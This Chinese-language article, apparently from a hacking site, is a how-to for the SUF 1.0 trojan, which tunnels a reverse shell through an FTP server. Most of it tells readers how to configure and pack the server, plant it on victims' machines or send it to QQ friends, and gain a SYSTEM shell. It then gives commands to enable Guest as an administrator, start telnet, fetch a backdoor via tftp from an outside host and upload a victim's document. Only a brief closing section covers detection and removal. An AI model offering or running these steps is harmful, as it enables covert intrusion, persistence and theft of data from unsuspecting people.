一個(gè)14歲的男孩經(jīng)過無數(shù)次的實(shí)驗(yàn)，推出了一款全新的木馬——SUF 1.0，該后門運(yùn)用了“反彈端口原理”與“FTP 隧道技術(shù)”，也就是兩臺(tái)機(jī)器不直接傳輸數(shù)據(jù)，而是利用第三臺(tái)機(jī)器（FTP服務(wù)器）來交換數(shù)據(jù).
　　SUF（Shell Use Ftp）顧名思義，就是通過FTP的Shell。這種奇妙的思路真叫絕的，它充分利用防火墻“外嚴(yán)內(nèi)不嚴(yán)”的漏洞，客戶端生成服務(wù)端后，把客戶端主機(jī)的IP發(fā)送到FTP里，然后別人運(yùn)行服務(wù)端后下載IP文件，然后通過反向連接，使客戶端知道服務(wù)端上線，然后把要執(zhí)行的命令發(fā)送到FTP里，服務(wù)端再讀取FTP里要執(zhí)行的命令，最后完成執(zhí)行。
　　說了這么一大堆，SUF是不是真的有這么厲害？用事實(shí)來說明一切，跟我來……
　　一、摩拳擦掌——配置服務(wù)端
　　和一般的木馬后門大體相同，首先將下載下來的SUF 1.0解壓縮，雙擊運(yùn)行其中的client.exe，出現(xiàn)主窗口，非常簡(jiǎn)潔明了吧！點(diǎn)擊“配置服務(wù)端”按鈕，彈出了配置對(duì)話窗口，這里僅需要配置一下FTP服務(wù)選項(xiàng)。在“FTP”欄中填入一個(gè)有寫權(quán)限的FTP服務(wù)器，如：Ftp.abc.com或者220.202.242.98。接著在“端口”欄中填寫好FTP服務(wù)器端口，默認(rèn)為21。再在“用戶名”和“密碼”欄中輸入FTP帳戶名稱和密碼，點(diǎn)擊“配置服務(wù)器”，出現(xiàn)一提示對(duì)話框，點(diǎn)擊“確定”，這時(shí)程序就會(huì)開始驗(yàn)證FTP服務(wù)器，驗(yàn)證成功后請(qǐng)選擇木馬服務(wù)端（server.exe）的路徑，最后完成配置。
　　小提示：如果要給服務(wù)端加殼，請(qǐng)?jiān)谂渲梅?wù)端之前給服務(wù)端（server.exe）加殼，服務(wù)端是可重復(fù)配置的。同時(shí)一定要確保使用的FTP帳戶對(duì)FTP服務(wù)器有寫的權(quán)限。
二、玩弄骨掌——輕松來控制
　　接下來是玩木馬后門必不可少的環(huán)節(jié)，那就是種植木馬。種植木馬的方法、途徑有很多，以前也專門有文章介紹過，大家可以發(fā)揮自己的聰明才智，把服務(wù)端上傳到肉雞或者發(fā)給QQ好友等，當(dāng)服務(wù)端程序被運(yùn)行后，一般的使用者很難感覺到計(jì)算機(jī)有異常，防火墻也不會(huì)出現(xiàn)報(bào)警。其實(shí)，一只黑手正在慢慢靠近，服務(wù)端程序會(huì)自動(dòng)從FTP服務(wù)器中獲取客戶端的IP地址，然后開始反向連接，這時(shí)服務(wù)端計(jì)算機(jī)的IP地址就會(huì)出現(xiàn)在客戶端的“上線列表”中。
　　小提示：客戶端計(jì)算機(jī)必須是直接連接到Internet，而不能是處于內(nèi)網(wǎng)中，同時(shí)，如果開啟了防火墻的話，請(qǐng)打開5915端口。
　　在“上線列表”中雙擊某一在線計(jì)算機(jī)的IP（例如：220.202.242.100），出現(xiàn)“連接到220.202.242.100”對(duì)話窗口，這就已經(jīng)得到了目標(biāo)計(jì)算機(jī)的一個(gè)系統(tǒng)權(quán)限的Shell，現(xiàn)在想干什么就自由發(fā)揮吧！
　　想想既然是送上門的肉雞，還是留個(gè)后門，以便日后再次光顧吧！這里就將Guest帳戶激活，并提升為管理員，再開啟目標(biāo)計(jì)算機(jī)的Telnet服務(wù)，下面就看如何來實(shí)現(xiàn)？請(qǐng)輸入命令：net user guest /active:yes，點(diǎn)擊“運(yùn)行”來激活Guest帳戶，再運(yùn)行命令：net localgroup administrators guest /add，將Guest加入管理員組，最后再運(yùn)行命令：net start telnet，開啟目標(biāo)計(jì)算機(jī)的遠(yuǎn)程登錄服務(wù)。
　　其實(shí)，在這里有很多東東可以應(yīng)用的，比如可以通過FTP命令或者TFTP來遠(yuǎn)程下載/上傳文件。這里假設(shè)已經(jīng)知道有一個(gè)TFTP服務(wù)器220.202.242.99，我們從服務(wù)器上下載一個(gè)后門程序Sy.exe，只要運(yùn)行命令：tftp 220.202.242.99 get sy.exe；要把肉雞上的一個(gè)數(shù)據(jù)文檔Ccash.doc上傳到TFTP服務(wù)器只要運(yùn)行命令：tftp 220.202.242.99 put Ccash.doc。
　　小提示：Windows自身附帶了一個(gè)簡(jiǎn)單的文件上傳下載程序Tftp.exe，可要建立TFTP服務(wù)器，就得借助TFTPD32了。
　　三、擺脫控制——隔離隧道
　　雖然SUF 1.0的實(shí)現(xiàn)方法非常隱蔽，可還是能夠?qū)⑵浣藴绲?，可以借助Active Ports(下載地址：http://www.ldcatv.com/soft/aports.rar)等端口實(shí)時(shí)監(jiān)測(cè)工具來發(fā)現(xiàn)、中止它。如果中了SUF后門，就可在“Active Ports”主窗口中發(fā)現(xiàn)兩個(gè)server.exe進(jìn)程，其中一個(gè)通過4319端口與FTP服務(wù)器進(jìn)行通訊，另一個(gè)通過4321端口與客戶端計(jì)算機(jī)進(jìn)行通訊。選擇它們，再點(diǎn)擊“Terminate Process”來結(jié)束進(jìn)程。然后在資源管理器中將server.exe刪除，這樣就擺脫了SUF的控制。

最新評(píng)論